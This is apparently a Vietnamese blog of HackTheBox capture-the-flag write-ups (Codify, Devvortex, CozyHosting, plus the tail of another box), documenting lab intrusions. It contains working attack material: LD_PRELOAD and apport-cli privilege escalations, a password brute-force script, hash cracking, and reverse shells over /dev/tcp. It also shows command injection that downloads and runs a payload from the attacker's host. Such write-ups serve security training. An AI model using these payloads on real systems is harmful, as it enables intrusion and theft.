  System information as of Sun 14 Apr 2024 06:03:58 PM UTC

  System load:  0.0               Processes:             115
  Usage of /:   57.5% of 8.02GB   Users logged in:       0
  Memory usage: 27%               IPv4 address for eth0: 10.10.55.1
  Swap usage:   0%


58 updates can be applied immediately.
33 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon Nov  6 07:56:40 2023 from 192.168.8.102
saad@m4lware:~$ id
uid=1000(saad) gid=1000(saad) groups=1000(saad)
saad@m4lware:~$ 
saad@m4lware:~$ ls -la
total 52
drwxr-xr-x 7 saad saad 4096 Jan 21  2023 .
drwxr-xr-x 3 root root 4096 Jan 20  2023 ..
-rw------- 1 saad saad  362 Jan 21  2023 .bash_history
-rw-r--r-- 1 saad saad  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 saad saad 3797 Jan 21  2023 .bashrc
drwx------ 2 saad saad 4096 Jan 20  2023 .cache
drwx------ 3 saad saad 4096 Jan 20  2023 .gnupg
drwxrwxr-x 3 saad saad 4096 Jan 20  2023 .local
-rw-r--r-- 1 saad saad  807 Feb 25  2020 .profile
drwx------ 3 saad saad 4096 Jan 20  2023 snap
drwx------ 2 saad saad 4096 Jan 21  2023 .ssh
-rwxr-xr-x 1 root root  150 Jan 20  2023 start_server.py
-rw-r--r-- 1 saad saad    0 Jan 20  2023 .sudo_as_admin_successful
-rw-rw---- 1 saad saad   33 Jan 21  2023 user.txt

Privilege escalation

Sau khi tìm loanh quanh user này, tôi có thông tin đăng nhập ở .bash_history

saad@m4lware:~$ cat .bash_history 
whoami
pwd
ls -al
ls
cd ..
sudo -l
echo "saad:******************$4291" > creds.txt
rm creds.txt
sudo -l
whomai
whoami
pwd
ls -al
sudo -l
ls -al
pwd
whoami
mysql -u root -p
netstat -antlp
mysql -u root
sudo su
ssh root@192.169.155.104
mysql -u user -p
mysql -u db_user -p
ls -ld /var/lib/mysql
ls -al
cat .bash_history 
cat .bash_logout 
nano .bashrc 
ls -al

Sử dụng nó để tìm kiếm các thông tin khác

saad@m4lware:~$ sudo -l
[sudo] password for saad: 
Matching Defaults entries for saad on m4lware:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, env_keep+=LD_PRELOAD

User saad may run the following commands on m4lware:
    (root) /usr/bin/ping

Để ý vào phần env_keep+=LD_PRELOAD, tìm kiếm về LD_PRELOAD privilege escalation, tôi tìm thấy hướng dẫn ngay ở link đầu tiên.

Làm theo hướng dẫn và tôi có root

saad@m4lware:~$ cd /tmp/
saad@m4lware:/tmp$ nano shell.c
saad@m4lware:/tmp$ gcc -shared -fPIC -o shell.so shell.c -nostartfiles
saad@m4lware:/tmp$ sudo LD_PRELOAD=/tmp/shell.so /usr/bin/ping
bash: fork: Resource temporarily unavailable
root@m4lware:/tmp# id
bash: fork: retry: Resource temporarily unavailable
root@m4lware:/tmp# exit
exit
sh: 1: Cannot fork
/usr/bin/lesspipe: 28: Cannot fork
root@m4lware:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@m4lware:/tmp# cd /root
root@m4lware:~# ls -la
total 44
drwx------  5 root root 4096 Nov  6 07:56 .
drwxr-xr-x 19 root root 4096 Dec  3  2022 ..
-rw-------  1 root root   48 Apr 14 18:57 .bash_history
-rw-r--r--  1 root root 3132 Jan 21  2023 .bashrc
drwxr-xr-x  3 root root 4096 Jan 20  2023 .cache
drwxr-xr-x  3 root root 4096 Jan 20  2023 .local
-rw-------  1 root root    1 Jan 21  2023 .mysql_history
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-------  1 root root    1 Jan 21  2023 .python_history
-rw-------  1 root root   33 Jan 21  2023 root.txt
drwx------  3 root root 4096 Jan 20  2023 snap
root@m4lware:~# 

HackTheBox - Codify

17 Mar 2024 in CTF on Web, Linux, Nodejs, Vm2 library, SSH, Shell script, Python, Hackthebox

Reconnaissance and Scanning
Enumeration
User Flag
Privilege Escalation

intro

Codify là một machine mức độ easy dựa trên lỗ hổng của thư viện trong Node.js để thực hiện RCE, cũng như lợi dụng các lỗ hổng trong bash để thực hiện leo thang đặc quyền lên root

Reconnaissance and Scanning

PORT     STATE SERVICE REASON  VERSION
22/tcp   open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 96:07:1c:c6:77:3e:07:a0:cc:6f:24:19:74:4d:57:0b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBN+/g3FqMmVlkT3XCSMH/JtvGJDW3+PBxqJ+pURQey6GMjs7abbrEOCcVugczanWj1WNU5jsaYzlkCEZHlsHLvk=
|   256 0b:a4:c0:cf:e2:3b:95:ae:f6:f5:df:7d:0c:88:d6:ce (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIm6HJTYy2teiiP6uZoSCHhsWHN+z3SVL/21fy6cZWZi
80/tcp   open  http    syn-ack Apache httpd 2.4.52
|_http-title: Codify
|_http-server-header: Apache/2.4.52 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
3000/tcp open  http    syn-ack Node.js Express framework
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Thêm domain codify.htb vào file hosts.

sudo nano /etc/hosts

127.0.0.1       localhost
127.0.1.1       4nhHT.  4nhHT
10.10.11.239    codify.htb
# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

Enumeration

Truy cập web với port 3000. Sau khi kiểm tra một lượt các page của web này, tôi tìm thấy phần có thể khai thác ở đây

one

Thử truy cập vào link vm2, tôi được vm2 phiên bản 3.9.16. Tìm kiếm phiên bản này trên internet, tôi tìm thấy CVE-2023-30547. Theo các bước của PoC

two

Thử thay thế payload để lấy RCE

three

User Flag

Tìm kiếm xoay quanh các file thư mục trong /var/www/, tôi tìm thấy 1 file db

svc@codify:~$ ls -la /var/www/contact
ls -la /var/www/contact
total 120
drwxr-xr-x 3 svc  svc   4096 Sep 12  2023 .
drwxr-xr-x 5 root root  4096 Sep 12  2023 ..
-rw-rw-r-- 1 svc  svc   4377 Apr 19  2023 index.js
-rw-rw-r-- 1 svc  svc    268 Apr 19  2023 package.json
-rw-rw-r-- 1 svc  svc  77131 Apr 19  2023 package-lock.json
drwxrwxr-x 2 svc  svc   4096 Apr 21  2023 templates
-rw-r--r-- 1 svc  svc  20480 Sep 12  2023 tickets.db
svc@codify:~$ cat /var/www/contact/tickets.db
cat /var/www/contact/tickets.db
�T5��T�format 3@  .WJ
       otableticketsticketsCREATE TABLE tickets (id INTEGER PRIMARY KEY AUTOINCREMENT, name TEXT, topic TEXT, description TEXT, status TEXT)P++Ytablesqlite_sequencesqlite_sequenceCREATE TABLE sqlite_sequence(name,seq)��     tableusersusersCREATE TABLE users (
        id INTEGER PRIMARY KEY AUTOINCREMENT,
        username TEXT UNIQUE,
        password TEXT
��G�joshua$2a$12$SOn8Pf6z8fO/nVsNbAAequ************************
��
����ua  users
             ickets
r]r�h%%�Joe WilliamsLocal setup?I use this site lot of the time. Is it possible to set this up locally? Like instead of coming to this site, can I download this and set it up in my own computer? A feature like that would be nice.open� ;�wTom HanksNeed networking modulesI think it would be better if you can implement a way to handle network-based stuff. Would help me out a lot. Thanks!open
svc@codify:~$

Tôi có user joshua và password hash của user này. Sao chép nó về và crack bằng john

┌──(neo㉿4nhHT)-[~/HTB-Codify]
└─$ john -w=/usr/share/wordlists/rockyou.txt hash.txt
Created directory: /home/neo/.john
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 4096 for all loaded hashes
Will run 20 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
**********       (?)
1g 0:00:00:19 DONE (2024-03-24 22:09) 0.05122g/s 73.77p/s 73.77c/s 73.77C/s scotty..michel
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

┌──(neo㉿4nhHT)-[~/HTB-Codify]
└─$ ssh joshua@10.10.11.239
The authenticity of host '10.10.11.239 (10.10.11.239)' can't be established.
ED25519 key fingerprint is SHA256:Q8HdGZ3q/X62r8EukPF0ARSaCd+8gEhEJ10xotOsBBE.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.239' (ED25519) to the list of known hosts.
joshua@10.10.11.239's password:
joshua@codify:~$ id
uid=1000(joshua) gid=1000(joshua) groups=1000(joshua)
joshua@codify:~$ ls
python.py  script.py  user.txt
joshua@codify:~$

Privilege Escalation

sudo -l

joshua@codify:~$ sudo -l
[sudo] password for joshua:
Matching Defaults entries for joshua on codify:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User joshua may run the following commands on codify:
    (root) /opt/scripts/mysql-backup.sh
joshua@codify:~$ cat /opt/scripts/mysql-backup.sh
#!/bin/bash
DB_USER="root"
DB_PASS=$(/usr/bin/cat /root/.creds)
BACKUP_DIR="/var/backups/mysql"

read -s -p "Enter MySQL password for $DB_USER: " USER_PASS
/usr/bin/echo

if [[ $DB_PASS == $USER_PASS ]]; then
        /usr/bin/echo "Password confirmed!"
else
        /usr/bin/echo "Password confirmation failed!"
        exit 1
fi

/usr/bin/mkdir -p "$BACKUP_DIR"

databases=$(/usr/bin/mysql -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" -e "SHOW DATABASES;" | /usr/bin/grep -Ev "(Database|information_schema|performance_schema)")

for db in $databases; do
    /usr/bin/echo "Backing up database: $db"
    /usr/bin/mysqldump --force -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" "$db" | /usr/bin/gzip > "$BACKUP_DIR/$db.sql.gz"
done

/usr/bin/echo "All databases backed up successfully!"
/usr/bin/echo "Changing the permissions"
/usr/bin/chown root:sys-adm "$BACKUP_DIR"
/usr/bin/chmod 774 -R "$BACKUP_DIR"
/usr/bin/echo 'Done!'
joshua@codify:~$

Phân tích file bash này và tìm hiểu thông tin trên internet, tôi tìm thấy lỗ hổng trong việc so sánh DB_PASS và USER_PASS, được gọi là unquoted variable comparison, nó liên quan đến 2 dấu bằng ==.

HIểu đơn giản là trong bash, nếu phía bên phải của dấu == không được trích dẫn trực tiếp, bash sẽ thực hiện khớp mẫu thay vì so sánh chuỗi. Trong trường hợp này, chúng ta có thể khớp bất kỳ ký tự nào mà được theo sau bởi một số lượng ký tự nào đó, ví dụ a******, AB*****

Áp dụng lỗi này, tôi sẽ viết một đoạn mã python đơn giản để kiểm tra mật khẩu, với logic đơn giản là thử từng ký tự một trong chuỗi password và theo sau bởi một số lượng ký tự bất kỳ nào đó.

import string
import os

chars = string.ascii_letters + string.digits
password=''
next=1

while next==1:
        for i in chars:
                errorlevel=os.system("echo "+password+i+"* | sudo /opt/scripts/mysql-backup.sh >/dev/null 2>&1")
                if errorlevel==0:
                        password=password+i
                        print("[+] new character found: "+password)
                        next=1
                        break
                else: next=0
print("[+] done, root password is: "+password)

Tạo 1 file exploit.py trên máy codify, sao chép đoạn code trên và lưu để chạy

joshua@codify:~$ nano exploit.py
joshua@codify:~$ python3 exploit.py
[sudo] password for joshua:
[+] new character found: k
[+] new character found: kl
[+] new character found: klj
[+] new character found: kljh
[+] new character found: kljh1
[+] new character found: kljh12
[+] new character found: kljh12k
[+] new character found: kljh12k3
[+] new character found: kljh12k3j
[+] new character found: kljh12k3jh
[+] new character found: kljh12k3jha
[+] new character found: kljh12k3jhas
[+] new character found: kljh12k3jhask
[+] new character found: kljh12k3jhaskj
[+] new character found: kljh12k3jhaskjh
[+] new character found: kljh12k3jhaskjh1
[+] new character found: kljh12k3jhaskjh12
[+] new character found: kljh12k3jhaskjh12k
[+] new character found: *******************
[+] new character found: ********************
[+] new character found: *********************
[+] done, root password is: **********************
joshua@codify:~$

joshua@codify:~$ su root
Password:
root@codify:/home/joshua# id
uid=0(root) gid=0(root) groups=0(root)
root@codify:/home/joshua# ls /root
root.txt  scripts
root@codify:/home/joshua#

HackTheBox - Devvortex

10 Mar 2024 in CTF on Web, Joomla, Linux, Mysql, SSH, Command Injection, Apport-cli, Hackthebox

Reconnaissance and Scanning
Enumeration
User Flag
Privilege Escalation

info

Devvortex là một machine đơn giản xoay quanh kỹ thuật áp dụng các lỗ hổng đã có PoC để tải RCE lên Joomla CMS, lấy user password trong mysql và nâng cao đặc quyền với apport-cli

Reconnaissance and Scanning

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://devvortex.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Thêm devvortex.htb vào /etc/hosts để phân giải tên miền với IP 10.10.11.242

nano /etc/hosts

10.10.11.242 devvortex.htb

Truy cập http://devvortex.htb và thử các cách đơn giản để thu thập các thông tin cơ bản của web server này như: robots.txt, index.php, v.v…. Tuy nhiên không có kết quả nào đáng giá, nên tôi sẽ thử tìm kiếm sub domain vì việc cung cấp domain hẳn phải có lý do nào đó.

┌──(root㉿kali)-[/home/neo]
└─# ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u http://devvortex.htb -H "Host: FUZZ.devvortex.htb" -fs 154

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://devvortex.htb
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
 :: Header           : Host: FUZZ.devvortex.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 154
________________________________________________

dev                     [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 122ms]

Thêm subdomain vào file hosts

nano /etc/hosts

10.10.11.242 devvortex.htb dev.devvotex.htb

Truy cập http://dev.devvotex.htb. Sử dụng Wappalyzer để check các thành phần cấu tạo nên web này.

Enumeration

Kiểm tra phiên bản của Joomla

Tìm kiếm các lỗ hổng Joomla phiên bản 4.2.6, tôi tìm thấy CVE-2023-23752, thử git clone nó về và chạy

┌──(root㉿kali)-[/home/neo]
└─# ruby exploit.rb http://dev.devvortex.htb 
Users
[649] lewis (lewis) - lewis@devvortex.htb - Super Users
[650] logan paul (logan) - logan@devvortex.htb - Registered

Site info
Site name: Development
Editor: tinymce
Captcha: 0
Access: 1
Debug status: false

Database info
DB type: mysqli
DB host: localhost
DB user: lewis
DB password: ******************
DB name: joomla
DB prefix: sd4fg_
DB encryption 0

Vậy là tôi vừa biết được trong server có 2 user là lewis và logan, vừa có thông tin đăng nhập của lewis

Truy cập http://dev.devvortex.htb/administrator/ để đăng nhập với user lewis

Để tạo được RCE, có thể thêm reverse shell vào một trong các file php của template

System -> Site templates -> Cassiopeia Details and Files, chọn một trong số các file có sẵn và sửa nội dung thành reverse shell của mình. Tôi chọn shell bên dưới:

exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.6/9001 0>&1'");

Bật nc: nc -lnvp 9001

Lưu file và truy cập đường dẫn đến file vừa thay đổi

http://dev.devvortex.htb/templates/cassiopeia/error.php

┌──(root㉿kali)-[/home/kali/HTB/Devvortex]
└─# nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.77] from (UNKNOWN) [10.10.11.242] 60634
bash: cannot set terminal process group (855): Inappropriate ioctl for device
bash: no job control in this shell
www-data@devvortex:~/dev.devvortex.htb/templates/cassiopeia$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@devvortex:~/dev.devvortex.htb/templates/cassiopeia$ 

User Flag

Quay lại các thông tin ban đầu, tôi có được một thông tin đăng nhập dựa trên mysql. Vậy thì tôi sẽ thử đăng nhập vào mysql trên shell này.

www-data@devvortex:~/dev.devvortex.htb/templates/cassiopeia$ mysql -h localhost -u lewis -p                   
<emplates/cassiopeia$ mysql -h localhost -u lewis -p         
Enter password:
....
```python
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| joomla             |
| performance_schema |
+--------------------+
3 rows in set (0.00 sec)

mysql> use joomla;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> select username,password from sd4fg_users;
+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| lewis    | $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u |
| logan    | ---------------------------------------------------/yBtkIj12 |
+----------+--------------------------------------------------------------+
2 rows in set (0.00 sec)

Vậy là tôi tìm được password hash của logan ở đây. Sao chép hash này về máy và sử dụng john để crack nó

┌──(root㉿kali)-[/home/kali/HTB/Devvortex]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt                
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
*************    (?)     
1g 0:00:00:08 DONE (2024-03-17 11:30) 0.1239g/s 178.4p/s 178.4c/s 178.4C/s lacoste..michel
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

SSH login

┌──(root㉿kali)-[/home/kali/HTB/Devvortex]
└─# ssh logan@10.10.11.242
logan@10.10.11.242's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-167-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun 17 Mar 2024 03:29:10 PM UTC

  System load:  0.0               Processes:             197
  Usage of /:   67.7% of 4.76GB   Users logged in:       0
  Memory usage: 24%               IPv4 address for eth0: 10.10.11.242
  Swap usage:   0%

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sun Mar 17 09:12:48 2024 from 10.10.14.25
logan@devvortex:~$ id
uid=1000(logan) gid=1000(logan) groups=1000(logan)
logan@devvortex:~$ ls
final  getroot  new  user.txt
logan@devvortex:~$ 

Privilege Escalation

logan@devvortex:~$ sudo -l
[sudo] password for logan: 
Matching Defaults entries for logan on devvortex:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User logan may run the following commands on devvortex:
    (ALL : ALL) /usr/bin/apport-cli

apport là một service trong ubuntu dùng để thu thập các thông tin về hệ thống, chi tiết đọc thêm ở đây. Kiểm tra phiên bản của apport-cli này

logan@devvortex:~$ /usr/bin/apport-cli -v
2.20.11

Sau khi tìm kiếm các lỗ hổng về apport-cli 2.20.11 trên mạng, tôi tìm được CVE-2023-1326

Đầu tiên tôi sẽ tạo một file crash

logan@devvortex:~$ sleep 30  &
[1] 5471
logan@devvortex:~$ killall -SIGSEGV sleep
logan@devvortex:~$ cd /var/crash/
[1]+  Segmentation fault      (core dumped) sleep 30  (wd: ~)
(wd now: /var/crash)
logan@devvortex:/var/crash$ ll
total 40
drwxrwxrwt  2 root  root   4096 Mar 17 15:50 ./
drwxr-xr-x 13 root  root   4096 Sep 12  2023 ../
-rw-rw-r--  1 logan logan     0 Mar 17 14:04 some_crash_file.crash
-rw-r-----  1 logan logan 30238 Mar 17 15:50 _usr_bin_sleep.1000.crash
logan@devvortex:/var/crash$ 

Chạy tiến trình apport-cli với option -c để tạo report

logan@devvortex:/var/crash$ sudo /usr/bin/apport-cli -c /var/crash/_usr_bin_sleep.1000.crash 

*** Send problem report to the developers?

After the problem report has been sent, please fill out the form in the
automatically opened web browser.

What would you like to do? Your options are:
  S: Send report (29.9 KB)
  V: View report
  K: Keep report file for sending later or copying to somewhere else
  I: Cancel and ignore future crashes of this program version
  C: Cancel
Please choose (S/V/K/I/C): V

*** Collecting problem information

The collected information can be sent to the developers to improve the
application. This might take a few minutes.

Nhập !/bin/bash để lấy shell từ process này

................................ERROR: Cannot update /var/crash/_usr_bin_sleep.1000.crash: [Errno 13] Permission denied: '/var/crash/_usr_bin_sleep.1000.crash'
...........................
root@devvortex:/var/crash#
root@devvortex:/var/crash# id
uid=0(root) gid=0(root) groups=0(root)
root@devvortex:/var/crash# ls -la /root
total 40
drwx------  6 root root 4096 Mar 17 09:43 .
drwxr-xr-x 19 root root 4096 Oct 26 15:12 ..
lrwxrwxrwx  1 root root    9 Jan 20  2021 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Dec  5  2019 .bashrc
drwx------  2 root root 4096 Feb 26 14:30 .cache
drwxr-xr-x  3 root root 4096 Oct 29 16:21 .cleanup
-rw-------  1 root root   38 Mar 17 09:43 .lesshst
drwxr-xr-x  3 root root 4096 Feb 26 14:30 .local
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-r-----  1 root root   33 Mar 17 06:39 root.txt
drwx------  2 root root 4096 Oct 26 15:12 .ssh
root@devvortex:/var/crash# 

HackTheBox - CozyHosting

07 Oct 2023 in CTF on Web, Linux, Spring Boot, SSH, GTFOBins, Burpsuite, Command Injection, Hackthebox

Reconnaissance and Scanning
Enumeration
RCE
SSH
Privilege escalation

intro

Reconnaissance and Scanning

PORT      STATE SERVICE   REASON         VERSION
22/tcp    open  ssh       syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4356bca7f2ec46ddc10f83304c2caaa8 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEpNwlByWMKMm7ZgDWRW+WZ9uHc/0Ehct692T5VBBGaWhA71L+yFgM/SqhtUoy0bO8otHbpy3bPBFtmjqQPsbC8=
|   256 6f7a6c3fa68de27595d47b71ac4f7e42 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHVzF8iMVIHgp9xMX9qxvbaoXVg1xkGLo61jXuUAYq5q
80/tcp    open  http      syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://cozyhosting.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
8000/tcp  open  http-alt? syn-ack ttl 63
8083/tcp  open  us-srv?   syn-ack ttl 63
12345/tcp open  netbus?   syn-ack ttl 63
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Thêm host vào /etc/hosts để truy cập web server

127.0.0.1       localhost
127.0.1.1       kali
10.10.11.230    cozyhosting.htb
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters

Dùng nuclei để scan qua web này

┌──(root㉿kali)-[/home/kali]
└─# nuclei -u http://cozyhosting.htb

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v2.9.10

                projectdiscovery.io

[WRN] Found 1 templates with syntax error (use -validate flag for further examination)
[INF] Current nuclei version: v2.9.10 (outdated)
[INF] Current nuclei-templates version: v9.6.4 (latest)
[INF] New templates added in latest release: 121
[INF] Templates loaded for current scan: 6893
[INF] Targets loaded for current scan: 1
[INF] Templates clustered: 1202 (Reduced 1141 Requests)
[nginx-version] [http] [info] http://cozyhosting.htb [nginx/1.18.0]
[INF] Using Interactsh Server: oast.site
[tech-detect:bootstrap] [http] [info] http://cozyhosting.htb
[tech-detect:google-font-api] [http] [info] http://cozyhosting.htb
[tech-detect:nginx] [http] [info] http://cozyhosting.htb
[dns-saas-service-detection] [dns] [info] cozyhosting.htb
[springboot-actuator:available-endpoints] [http] [info] http://cozyhosting.htb/actuator [self,sessions,beans,env,env-toMatch,health,health-path,mappings]                       [options-method] [http] [info] http://cozyhosting.htb [GET,HEAD,OPTIONS]
[springboot-env] [http] [low] http://cozyhosting.htb/actuator/env
[http-missing-security-headers:cross-origin-opener-policy] [http] [info] http://cozyhosting.htb
[http-missing-security-headers:cross-origin-resource-policy] [http] [info] http://cozyhosting.htb
[http-missing-security-headers:strict-transport-security] [http] [info] http://cozyhosting.htb
[http-missing-security-headers:permissions-policy] [http] [info] http://cozyhosting.htb
[http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] http://cozyhosting.htb
[http-missing-security-headers:cross-origin-embedder-policy] [http] [info] http://cozyhosting.htb
[http-missing-security-headers:content-security-policy] [http] [info] http://cozyhosting.htb
[http-missing-security-headers:referrer-policy] [http] [info] http://cozyhosting.htb
[http-missing-security-headers:clear-site-data] [http] [info] http://cozyhosting.htb
[springboot-mappings] [http] [low] http://cozyhosting.htb/actuator/mappings
[openssh-detect] [tcp] [info] cozyhosting.htb:22 [SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.3]
[spring-detect] [http] [info] http://cozyhosting.htb/error
[waf-detect:nginxgeneric] [http] [info] http://cozyhosting.htb/
[springboot-beans] [http] [low] http://cozyhosting.htb/actuator/beans

Để ý có dir là actuator, đây là Spring Boot.

Sử dụng dirsearch

┌──(root㉿kali)-[/home/kali/jexboss]
└─# dirsearch -u http://cozyhosting.htb -w /usr/share/seclists/Discovery/Web-Content/spring-boot.txt              

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                             
 (_||| _) (/_(_|| (_| )                                                                                                      
                                                                                                                             
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 112
Output File: /root/.dirsearch/reports/cozyhosting.htb/_23-10-07_06-37-28.txt
Error Log: /root/.dirsearch/logs/errors-23-10-07_06-37-28.log
Target: http://cozyhosting.htb/
[06:37:29] Starting: 
[06:37:29] 200 -  634B  - /actuator                                         
[06:37:29] 200 -    5KB - /actuator/env                                     
[06:37:29] 200 -  487B  - /actuator/env/path
[06:37:29] 200 -  487B  - /actuator/env/home                                
[06:37:30] 200 -  487B  - /actuator/env/lang                                
[06:37:30] 200 -   15B  - /actuator/health                                  
[06:37:30] 200 -   10KB - /actuator/mappings                                
[06:37:30] 200 -   98B  - /actuator/sessions                                
[06:37:30] 200 -  124KB - /actuator/beans                                               Task Completed            

Tôi có /actuator/sessions

┌──(root㉿kali)-[/home/kali/jexboss]
└─# curl http://cozyhosting.htb/actuator/sessions
{"6D3BD4BCE55E6178BBDFA87EEB570468":"kanderson"}     

Enumeration

Sử dụng burpsuite để chèn sessionID

burp

web

Thử nhập input vào 2 trường và bắt request bằng burp

command

Ở trường location trong response trả về cho tôi kết quả của kết nối. Vậy thì tôi có thể thử command injection để server trả kết quả về cho tôi được không

space

Thử bypass without space

ping

Thử thêm dấu nháy ngược

ping2

Vậy là thành công. Tôi sẽ sử dụng cách này để tải RCE lên máy.

RCE

Đầu tiên, tất nhiên rồi, tạo RCE trước. Tạo 1 file với tên rce.sh với IP và port (dùng để tạo listener)

bash -c "/bin/bash -i >& /dev/tcp/10.10.14.65/5555 0>&1"

cd đến thư mục chứa rce phía trên và tạo local http server

┌──(root㉿kali)-[/home/kali]
└─# python3 -m http.server 2345
Serving HTTP on 0.0.0.0 port 2345 (http://0.0.0.0:2345/) ...

Tiếp theo tải RCE lên máy (IP VPN của tôi đã thay đổi) theo lệnh

host=10.10.14.65&username=`wget${IFS}http://10.10.14.65:2345/rce.sh${IFS}-P${IFS}/tmp`

upload

Quay lại http server để kiểm tra

┌──(root㉿kali)-[/home/kali]
└─# python3 -m http.server 2345
Serving HTTP on 0.0.0.0 port 2345 (http://0.0.0.0:2345/) ...
10.10.11.230 - - [09/Oct/2023 04:37:38] "GET /rce.sh HTTP/1.1" 200 -

Thay đổi permission của file RCE (burp request)

host=10.10.14.65&username=`chmod${IFS}777${IFS}/tmp/rce.sh`

Tạo listener trên máy attack

┌──(root㉿kali)-[/home/kali]
└─# nc -lnvp 5555
listening on [any] 5555 ...

Chạy RCE

host=10.10.14.65&username=`bash${IFS}/tmp/rce.sh`

Quay lại listener

┌──(root㉿kali)-[/home/kali]
└─# nc -lnvp 5555
listening on [any] 5555 ...
connect to [10.10.14.65] from (UNKNOWN) [10.10.11.230] 43542
bash: cannot set terminal process group (1043): Inappropriate ioctl for device
bash: no job control in this shell
app@cozyhosting:/app$ id
id
